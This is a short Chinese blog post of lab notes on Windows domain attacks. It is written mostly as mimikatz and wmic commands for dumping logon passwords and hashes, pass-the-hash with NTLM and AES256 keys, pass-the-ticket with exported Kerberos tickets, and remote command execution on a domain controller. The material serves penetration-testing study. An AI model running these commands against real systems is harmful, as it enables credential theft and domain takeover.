域内安全


域内安全

mimikatz在内网中使用

一般来说域环境里面,用户信息在ntds.dit,加密后为散列值

LM Hash,NTLM Hash

user1:RID:LM-HASH:NT-HASH

NTML 基于md4

打开linux

使用mimikatz传到靶机
进入shell
mimikatz "privilege::debug" "log" "sekurlsa::logonpasswords" //把所有能搜集到的用户名密码明文读取

在win2008之后就不太好使了

pass the hash

另开一个win2012,是域里面的一台主机,假设已经入侵成功

使用mimikatz获得域控的NTLM hash值
mimikatz "privilege::debug" "log" "sekurlsa::logonpasswords"
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:test1.com /ntlm:hash值"

弹出一个cmd框,在框里输入

dir \\dc-1\c$
type \\dc-1\c$a.txt

发现可以控制域控了

进入下一种方式

shell
cd x64
mimikatz "privilege::debug" "sekurlsa::ekeys" //看到aes256的hash
aes256也可以pass the hash
mimikatz "privilege::debug" "sekurlsa::pth /user:test2 /domain:test1.com /aes256:hash"
又新建一个cmd

票据传递

进入mimikatz,先票据导出

mimikatz
privilege::debug
sekurlsa::tickets /export

内存中票据清理

kerberos::purge

拿到票据该怎么使用

mimikatz "kerberos::ptt" c:\x64\你要用的票据文件.kirbi
把票据注入到内存中

在本cmd中

dir \\dc-1\c$
直接进行访问

wmic命令执行

进入一个system权限的session

shell
wmic /node:域控ip /user:test2 /password:test123! process call create "cmd.exe /c ipconfig > c:\ip.txt"
exit
migrate //查看进程
migrate 进程号
dir \\dc-1\c$

文章作者: Broken-year
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
  目录